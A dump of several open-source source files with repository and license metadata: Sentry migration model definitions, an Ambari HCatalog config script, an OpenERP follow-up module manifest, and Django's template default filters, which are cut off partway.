'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.release': {
'Meta': {'unique_together': "(('project', 'version'),)", 'object_name': 'Release'},
'data': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_released': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile'},
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.savedsearch': {
'Meta': {'unique_together': "(('project', 'name'),)", 'object_name': 'SavedSearch'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'query': ('django.db.models.fields.TextField', [], {})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.userreport': {
'Meta': {'object_name': 'UserReport', 'index_together': "(('project', 'event_id'),)"},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
}
}
complete_apps = ['sentry']
symmetrical = True
| bsd-3-clause |
alexryndin/ambari | ambari-funtest/src/test/resources/stacks/HDP/2.0.7/services/HIVE/package/scripts/hcat.py | 20 | 1311 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management import *
import sys
def hcat():
import params
Directory(params.hcat_conf_dir,
owner=params.hcat_user,
group=params.user_group,
)
Directory(params.hcat_pid_dir,
owner=params.webhcat_user,
create_parents = True
)
hcat_TemplateConfig('hcat-env.sh')
def hcat_TemplateConfig(name):
import params
TemplateConfig(format("{hcat_conf_dir}/{name}"),
owner=params.hcat_user,
group=params.user_group
)
| apache-2.0 |
3dfxmadscientist/cbss-server | addons/account_followup/__openerp__.py | 58 | 3009 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Payment Follow-up Management',
'version': '1.0',
'category': 'Accounting & Finance',
'description': """
Module to automate letters for unpaid invoices, with multi-level recalls.
=========================================================================
You can define your multiple levels of recall through the menu:
---------------------------------------------------------------
Configuration / Follow-Up Levels
Once it is defined, you can automatically print recalls every day through simply clicking on the menu:
------------------------------------------------------------------------------------------------------
Payment Follow-Up / Send Email and letters
It will generate a PDF / send emails / set manual actions according to the the different levels
of recall defined. You can define different policies for different companies.
Note that if you want to check the follow-up level for a given partner/account entry, you can do from in the menu:
------------------------------------------------------------------------------------------------------------------
Reporting / Accounting / **Follow-ups Analysis
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'images': ['images/follow_ups.jpeg','images/send_followups.jpeg'],
'depends': ['account_accountant', 'mail'],
'data': [
'security/account_followup_security.xml',
'security/ir.model.access.csv',
'report/account_followup_report.xml',
'account_followup_data.xml',
'account_followup_view.xml',
'account_followup_customers.xml',
'wizard/account_followup_print_view.xml',
],
'demo': ['account_followup_demo.xml'],
'test': [
'test/account_followup.yml',
#TODO 'test/account_followup_report.yml', --> Need to wait for second step in order to check report (expects after first)
],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
riklaunim/django-custom-multisite | django/template/defaultfilters.py | 78 | 28490 | """Default variable filters."""
import re
import random as random_module
import unicodedata
from decimal import Decimal, InvalidOperation, Context, ROUND_HALF_UP
from functools import wraps
from pprint import pformat
from django.template.base import Variable, Library, VariableDoesNotExist
from django.conf import settings
from django.utils import formats
from django.utils.dateformat import format, time_format
from django.utils.encoding import force_unicode, iri_to_uri
from django.utils.html import (conditional_escape, escapejs, fix_ampersands,
escape, urlize as urlize_impl, linebreaks, strip_tags)
from django.utils.http import urlquote
from django.utils.text import Truncator, wrap, phone2numeric
from django.utils.safestring import mark_safe, SafeData, mark_for_escaping
from django.utils.timesince import timesince, timeuntil
from django.utils.translation import ugettext, ungettext
from django.utils.text import normalize_newlines
register = Library()
#######################
# STRING DECORATOR #
#######################
def stringfilter(func):
"""
Decorator for filters which should only receive unicode objects. The object
passed as the first positional argument will be converted to a unicode
object.
"""
def _dec(*args, **kwargs):
if args:
args = list(args)
args[0] = force_unicode(args[0])
if (isinstance(args[0], SafeData) and
getattr(_dec._decorated_function, 'is_safe', False)):
return mark_safe(func(*args, **kwargs))
return func(*args, **kwargs)
# Include a reference to the real function (used to check original
# arguments by the template parser, and to bear the 'is_safe' attribute
# when multiple decorators are applied).
_dec._decorated_function = getattr(func, '_decorated_function', func)
for attr in ('is_safe', 'needs_autoescape'):
if hasattr(func, attr):
import warnings
warnings.warn("Setting the %s attribute of a template filter "
"function is deprecated; use @register.filter(%s=%s) "
"instead" % (attr, attr, getattr(func, attr)),
PendingDeprecationWarning)
setattr(_dec, attr, getattr(func, attr))
return wraps(func)(_dec)
###################
# STRINGS #
###################
@register.filter(is_safe=True)
@stringfilter
def addslashes(value):
"""
Adds slashes before quotes. Useful for escaping strings in CSV, for
example. Less useful for escaping JavaScript; use the ``escapejs``
filter instead.
"""
return value.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
@register.filter(is_safe=True)
@stringfilter
def capfirst(value):
"""Capitalizes the first character of the value."""
return value and value[0].upper() + value[1:]
@register.filter("escapejs")
@stringfilter
def escapejs_filter(value):
"""Hex encodes characters for use in JavaScript strings."""
return escapejs(value)
@register.filter("fix_ampersands", is_safe=True)
@stringfilter
def fix_ampersands_filter(value):
"""Replaces ampersands with ``&`` entities."""
return fix_ampersands(value)
# Values for testing floatformat input against infinity and NaN representations,
# which differ across platforms and Python versions. Some (i.e. old Windows
# ones) are not recognized by Decimal but we want to return them unchanged vs.
# returning an empty string as we do for completley invalid input. Note these
# need to be built up from values that are not inf/nan, since inf/nan values do
# not reload properly from .pyc files on Windows prior to some level of Python 2.5
# (see Python Issue757815 and Issue1080440).
pos_inf = 1e200 * 1e200
neg_inf = -1e200 * 1e200
nan = (1e200 * 1e200) // (1e200 * 1e200)
special_floats = [str(pos_inf), str(neg_inf), str(nan)]
@register.filter(is_safe=True)
def floatformat(text, arg=-1):
"""
Displays a float to a specified number of decimal places.
If called without an argument, it displays the floating point number with
one decimal place -- but only if there's a decimal place to be displayed:
* num1 = 34.23234
* num2 = 34.00000
* num3 = 34.26000
* {{ num1|floatformat }} displays "34.2"
* {{ num2|floatformat }} displays "34"
* {{ num3|floatformat }} displays "34.3"
If arg is positive, it will always display exactly arg number of decimal
places:
* {{ num1|floatformat:3 }} displays "34.232"
* {{ num2|floatformat:3 }} displays "34.000"
* {{ num3|floatformat:3 }} displays "34.260"
If arg is negative, it will display arg number of decimal places -- but
only if there are places to be displayed:
* {{ num1|floatformat:"-3" }} displays "34.232"
* {{ num2|floatformat:"-3" }} displays "34"
* {{ num3|floatformat:"-3" }} displays "34.260"
If the input float is infinity or NaN, the (platform-dependent) string
representation of that value will be displayed.
"""
try:
input_val = force_unicode(text)
d = Decimal(input_val)
except UnicodeEncodeError:
return u''
except InvalidOperation:
if input_val in special_floats:
return input_val
try:
d = Decimal(force_unicode(float(text)))
except (ValueError, InvalidOperation, TypeError, UnicodeEncodeError):
return u''
try:
p = int(arg)
except ValueError:
return input_val
try:
m = int(d) - d
except (ValueError, OverflowError, InvalidOperation):
return input_val
if not m and p < 0:
return mark_safe(formats.number_format(u'%d' % (int(d)), 0))
if p == 0:
exp = Decimal(1)
else:
exp = Decimal(u'1.0') / (Decimal(10) ** abs(p))
try:
# Set the precision high enough to avoid an exception, see #15789.
tupl = d.as_tuple()
units = len(tupl[1]) - tupl[2]
prec = abs(p) + units + 1
# Avoid conversion to scientific notation by accessing `sign`, `digits`
# and `exponent` from `Decimal.as_tuple()` directly.
sign, digits, exponent = d.quantize(exp, ROUND_HALF_UP,
Context(prec=prec)).as_tuple()
digits = [unicode(digit) for digit in reversed(digits)]
while len(digits) <= abs(exponent):
digits.append(u'0')
digits.insert(-exponent, u'.')
if sign:
digits.append(u'-')
number = u''.join(reversed(digits))
return mark_safe(formats.number_format(number, abs(p)))
except InvalidOperation:
return input_val
@register.filter(is_safe=True)
@stringfilter
def iriencode(value):
"""Escapes an IRI value for use in a URL."""
return force_unicode(iri_to_uri(value))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def linenumbers(value, autoescape=None):
"""Displays text with line numbers."""
lines = value.split(u'\n')
# Find the maximum width of the line count, for use with zero padding
# string format command
width = unicode(len(unicode(len(lines))))
if not autoescape or isinstance(value, SafeData):
for i, line in enumerate(lines):
lines[i] = (u"%0" + width + u"d. %s") % (i + 1, line)
else:
for i, line in enumerate(lines):
lines[i] = (u"%0" + width + u"d. %s") % (i + 1, escape(line))
return mark_safe(u'\n'.join(lines))
@register.filter(is_safe=True)
@stringfilter
def lower(value):
"""Converts a string into all lowercase."""
return value.lower()
@register.filter(is_safe=False)
@stringfilter
def make_list(value):
"""
Returns the value turned into a list.
For an integer, it's a list of digits.
For a string, it's a list of characters.
"""
return list(value)
@register.filter(is_safe=True)
@stringfilter
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
and converts spaces to hyphens.
"""
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s-]', '', value).strip().lower())
return mark_safe(re.sub('[-\s]+', '-', value))
@register.filter(is_safe=True)
def stringformat(value, arg):
"""
Formats the variable according to the arg, a string formatting specifier.
This specifier uses Python string formating syntax, with the exception that
the leading "%" is dropped.
See http://docs.python.org/lib/typesseq-strings.html for documentation
of Python string formatting
"""
try:
return (u"%" + unicode(arg)) % value
except (ValueError, TypeError):
return u""
@register.filter(is_safe=True)
@stringfilter
def title(value):
"""Converts a string into titlecase."""
t = re.sub("([a-z])'([A-Z])", lambda m: m.group(0).lower(), value.title())
return re.sub("\d([A-Z])", lambda m: m.group(0).lower(), t)
@register.filter(is_safe=True)
@stringfilter
def truncatechars(value, arg):
"""
Truncates a string after a certain number of characters.
Argument: Number of characters to truncate after.
"""
try:
length = int(arg)
except ValueError: # Invalid literal for int().
return value # Fail silently.
return Truncator(value).chars(length)
@register.filter(is_safe=True)
@stringfilter
def truncatewords(value, arg):
"""
Truncates a string after a certain number of words.
Argument: Number of words to truncate after.
Newlines within the string are removed.
"""
try:
length = int(arg)
except ValueError: # Invalid literal for int().
return value # Fail silently.
return Truncator(value).words(length, truncate=' ...')
@register.filter(is_safe=True)
@stringfilter
def truncatewords_html(value, arg):
"""
Truncates HTML after a certain number of words.
Argument: Number of words to truncate after.
Newlines in the HTML are preserved.
"""
try:
length = int(arg)
except ValueError: # invalid literal for int()
return value # Fail silently.
return Truncator(value).words(length, html=True, truncate=' ...')
@register.filter(is_safe=False)
@stringfilter
def upper(value):
"""Converts a string into all uppercase."""
return value.upper()
@register.filter(is_safe=False)
@stringfilter
def urlencode(value, safe=None):
"""
Escapes a value for use in a URL.
Takes an optional ``safe`` parameter used to determine the characters which
should not be escaped by Django's ``urlquote`` method. If not provided, the
default safe characters will be used (but an empty string can be provided
when *all* characters should be escaped).
"""
kwargs = {}
if safe is not None:
kwargs['safe'] = safe
return urlquote(value, **kwargs)
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def urlize(value, autoescape=None):
"""Converts URLs in plain text into clickable links."""
return mark_safe(urlize_impl(value, nofollow=True, autoescape=autoescape))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def urlizetrunc(value, limit, autoescape=None):
"""
Converts URLs into clickable links, truncating URLs to the given character
limit, and adding 'rel=nofollow' attribute to discourage spamming.
Argument: Length to truncate URLs to.
"""
return mark_safe(urlize_impl(value, trim_url_limit=int(limit), nofollow=True,
autoescape=autoescape))
@register.filter(is_safe=False)
@stringfilter
def wordcount(value):
"""Returns the number of words."""
return len(value.split())
@register.filter(is_safe=True)
@stringfilter
def wordwrap(value, arg):
"""
Wraps words at specified line length.
Argument: number of characters to wrap the text at.
"""
return wrap(value, int(arg))
@register.filter(is_safe=True)
@stringfilter
def ljust(value, arg):
"""
Left-aligns the value in a field of a given width.
Argument: field size.
"""
return value.ljust(int(arg))
@register.filter(is_safe=True)
@stringfilter
def rjust(value, arg):
"""
Right-aligns the value in a field of a given width.
Argument: field size.
"""
return value.rjust(int(arg))
@register.filter(is_safe=True)
@stringfilter
def center(value, arg):
"""Centers the value in a field of a given width."""
return value.center(int(arg))
@register.filter
@stringfilter
def cut(value, arg):
"""
Removes all values of arg from the given string.
"""
safe = isinstance(value, SafeData)
value = value.replace(arg, u'')
if safe and arg != ';':
return mark_safe(value)
return value
###################
# HTML STRINGS #
###################
@register.filter("escape", is_safe=True)
@stringfilter
def escape_filter(value):
"""
Marks the value as a string that should not be auto-escaped.
"""
return mark_for_escaping(value)
@register.filter(is_safe=True)
@stringfilter
def force_escape(value):
"""
Escapes a string's HTML. This returns a new string containing the escaped
characters (as opposed to "escape", which marks the content for later
possible escaping).
"""
return mark_safe(escape(value))
@register.filter("linebreaks", is_safe=True, needs_autoescape=True)
@stringfilter
def linebreaks_filter(value, autoescape=None):
"""
Replaces line breaks in plain text with appropriate HTML; a single
newline becomes an HTML line break (``<br />``) and a new line
followed by a blank line becomes a paragraph break (``</p>``).
"""
autoescape = autoescape and not isinstance(value, SafeData)
return mark_safe(linebreaks(value, autoescape))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def linebreaksbr(value, autoescape=None):
"""
Converts all newlines in a piece of plain text to HTML line breaks
(``<br />``).
"""
autoescape = autoescape and not isinstance(value, SafeData)
value = normalize_newlines(value)
if autoescape:
value = escape(value)
return mark_safe(value.replace('\n', '<br />'))
@register.filter(is_safe=True)
@stringfilter
def safe(value):
"""
Marks the value as a string that should not be auto-escaped.
"""
return mark_safe(value)
@register.filter(is_safe=True)
def safeseq(value):
"""
A "safe" filter for sequences. Marks each element in the sequence,
individually, as safe, after converting them to unicode. Returns a list
with the results.
"""
return [mark_safe(force_unicode(obj)) for obj in value]
@register.filter(is_safe=True)
@stringfilter
def removetags(value, tags):
"""Removes a space separated list of [X]HTML tags from the output."""
tags = [re.escape(tag) for tag in tags.split()]
tags_re = u'(%s)' % u'|'.join(tags)
starttag_re = re.compile(ur'<%s(/?>|(\s+[^>]*>))' % tags_re, re.U)
endtag_re = re.compile(u'</%s>' % tags_re)
value = starttag_re.sub(u'', value)
value = endtag_re.sub(u'', value)
return value
@register.filter(is_safe=True)
@stringfilter
def striptags(value):
"""Strips all [X]HTML tags."""
return strip_tags(value)
###################
# LISTS #
###################
@register.filter(is_safe=False)
def dictsort(value, arg):
"""
Takes a list of dicts, returns that list sorted by the property given in
the argument.
"""
try:
return sorted(value, key=Variable(arg).resolve)
except (TypeError, VariableDoesNotExist):
return u''
@register.filter(is_safe=False)
def dictsortreversed(value, arg):
"""
Takes a list of dicts, returns that list sorted in reverse order by the
property given in the argument.
"""
try:
return sorted(value, key=Variable(arg).resolve, reverse=True)
except (TypeError, VariableDoesNotExist):
return u''
@register.filter(is_safe=False)
def first(value):
"""Returns the first item in a list."""
try:
return value[0]
except IndexError:
return u''
@register.filter(is_safe=True, needs_autoescape=True)
def join(value, arg, autoescape=None):
"""
Joins a list with a string, like Python's ``str.join(list)``.
"""
value = map(force_unicode, value)
if autoescape:
value = [conditional_escape(v) for v in value]
try:
data = conditional_escape(arg).join(value)
except AttributeError: # fail silently but nicely
return value
return mark_safe(data)
@register.filter(is_safe=True)
def last(value):
"Returns the last item in a list"
try:
return value[-1]
except IndexError:
return u''
@register.filter(is_safe=True)
def length(value):
"""Returns the length of the value - useful for lists."""
try:
return len(value)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=False)
def length_is(value, arg):
"""Returns a boolean of whether the value's length is the argument."""
try:
return len(value) == int(arg)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=True)
def random(value):
"""Returns a random item from the list."""
return random_module.choice(value)
@register.filter("slice", is_safe=True)
def slice_filter(value, arg):
"""
Returns a slice of the list.
Uses the same syntax as Python's list slicing; see
http://diveintopython.org/native_data_types/lists.html#odbchelper.list.slice
for an introduction.
"""
try:
bits = []
for x in arg.split(u':'):
if len(x) == 0:
bits.append(None)
else:
bits.append(int(x))
return value[slice(*bits)]
except (ValueError, TypeError):
return value # Fail silently.
@register.filter(is_safe=True, needs_autoescape=True)
def unordered_list(value, autoescape=None):
"""
Recursively takes a self-nested list and returns an HTML unordered list --
WITHOUT opening and closing <ul> tags.
The list is assumed to be in the proper format. For example, if ``var``
contains: ``['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]``,
then ``{{ var|unordered_list }}`` would return::
<li>States
<ul>
<li>Kansas
<ul>
<li>Lawrence</li>
<li>Topeka</li>
</ul>
</li>
<li>Illinois</li>
</ul>
</li>
"""
if autoescape:
escaper = conditional_escape
else:
escaper = lambda x: x
def convert_old_style_list(list_):
"""
Converts old style lists to the new easier to understand format.
The old list format looked like:
['Item 1', [['Item 1.1', []], ['Item 1.2', []]]
And it is converted to:
['Item 1', ['Item 1.1', 'Item 1.2]]
"""
if not isinstance(list_, (tuple, list)) or len(list_) != 2:
return list_, False
first_item, second_item = list_
if second_item == []:
return [first_item], True
try:
# see if second item is iterable
iter(second_item)
except TypeError:
return list_, False
old_style_list = True
new_second_item = []
for sublist in second_item:
item, old_style_list = convert_old_style_list(sublist)
if not old_style_list:
break
new_second_item.extend(item)
if old_style_list:
second_item = new_second_item
return [first_item, second_item], old_style_list
def _helper(list_, tabs=1):
indent = u'\t' * tabs
output = []
list_length = len(list_)
i = 0
while i < list_length:
title = list_[i]
sublist = ''
sublist_item = None
if isinstance(title, (list, tuple)):
sublist_item = title
title = ''
elif i < list_length - 1:
next_item = list_[i+1]
if next_item and isinstance(next_item, (list, tuple)):
# The next item is a sub-list.
sublist_item = next_item
# We've processed the next item now too.
i += 1
if sublist_item:
sublist = _helper(sublist_item, tabs+1)
sublist = '\n%s<ul>\n%s\n%s</ul>\n%s' % (indent, sublist,
indent, indent)
output.append('%s<li>%s%s</li>' % (indent,
escaper(force_unicode(title)), sublist))
i += 1
return '\n'.join(output)
value, converted = convert_old_style_list(value)
return mark_safe(_helper(value))
###################
# INTEGERS #
###################
@register.filter(is_safe=False)
def add(value, arg):
"""Adds the arg to the value."""
try:
return int(value) + int(arg)
except (ValueError, TypeError):
try:
return value + arg
except Exception:
return ''
@register.filter(is_safe=False)
def get_digit(value, arg):
"""
Given a whole number, returns the requested digit of it, where 1 is the
right-most digit, 2 is the second-right-most digit, etc. Returns the
original value for invalid input (if input or argument is not an integer,
or if argument is less than 1). Otherwise, output is always an integer.
"""
try:
arg = int(arg)
value = int(value)
except ValueError:
return value # Fail silently for an invalid argument
if arg < 1:
return value
try:
return int(str(value)[-arg])
except IndexError:
return 0
###################
# DATES #
###################
@register.filter(expects_localtime=True, is_safe=False)
def date(value, arg=None):
"""Formats a date according to the given format."""
if not value:
return u''
if arg is None:
arg = settings.DATE_FORMAT
try:
return formats.date_format(value, arg)
except AttributeError:
try:
return format(value, arg)
except AttributeError:
return ''
@register.filter(expects_localtime=True, is_safe=False)
def time(value, arg=None):
"""Formats a time according to the given format."""
if value in (None, u''):
return u''
if arg is None:
arg = settings.TIME_FORMAT
try:
return formats.time_format(value, arg)
except AttributeError:
try:
return time_format(value, arg)
except AttributeError:
return ''
@register.filter("timesince", is_safe=False)
def timesince_filter(value, arg=None):
"""Formats a date as the time since that date (i.e. "4 days, 6 hours")."""
if not value:
return u''
try:
if arg:
return timesince(value, arg)
return timesince(value)
except (ValueError, TypeError):
return u''
@register.filter("timeuntil", is_safe=False)
def timeuntil_filter(value, arg=None):
"""Formats a date as the time until that date (i.e. "4 days, 6 hours")."""
if not value:
return u''
try:
return timeuntil(value, arg)
except (ValueError, TypeError):
return u''
###################
# LOGIC #
###################
@register.filter(is_safe=False)
def default(value, arg):
"""If value is unavailable, use given default."""
return value or arg
@register.filter(is_safe=False)
def default_if_none(value, arg):
"""If value is None, use given default."""
if value is None:
return arg
return value
@register.filter(is_safe=False)
def divisibleby(value, arg):
"""Returns True if the value is devisible by the argument."""
return int(value) % int(arg) == 0
@register.filter(is_safe=False)
def yesno(value, arg=None):
"""
Given a string mapping values for true, false and (optionally) None,
returns one of those strings according to the value:
========== ====================== ==================================
Value Argument Outputs
========== ====================== ==================================
``True`` ``"yeah,no,maybe"`` ``yeah``
``False`` ``"yeah,no,maybe"`` ``no``
``None`` ``"yeah,no,maybe"`` ``maybe``
``None`` ``"yeah,no"`` ``"no"`` (converts None to False
if no mapping for None is given.
========== ====================== ==================================
"""
if arg is None:
arg = ugettext('yes,no,maybe')
bits = arg.split(u',')
if len(bits) < 2:
return value # Invalid arg.
try:
yes, no, maybe = bits
except ValueError:
# Unpack list of wrong size (no "maybe" value provided).
yes, no, maybe = bits[0], bits[1], bits[1]
if value is None:
return maybe
if value:
return yes
return no
###################
# MISC #
###################
@register.filter(is_safe=True)
def filesizeformat(bytes):
"""
Formats the value like a 'human-readable' file size (i.e. 13 KB, 4.1 MB,
102 bytes, etc).
"""
try:
bytes = float(bytes)
except (TypeError,ValueError,UnicodeDecodeError):
return ungettext("%(size)d byte", "%(size)d bytes", 0) % {'size': 0}
filesize_number_format = lambda value: formats.number_format(round(value, 1), 1)
if bytes < 1024:
return ungettext("%(size)d byte", "%(size)d bytes", bytes) % {'size': bytes}
if bytes < 1024 * 1024:
return ugettext("%s KB") % filesize_number_format(bytes / 1024)
if bytes < 1024 * 1024 * 1024:
return ugettext("%s MB") % filesize_number_format(bytes / (1024 * 1024))
if bytes < 1024 * 1024 * 1024 * 1024:
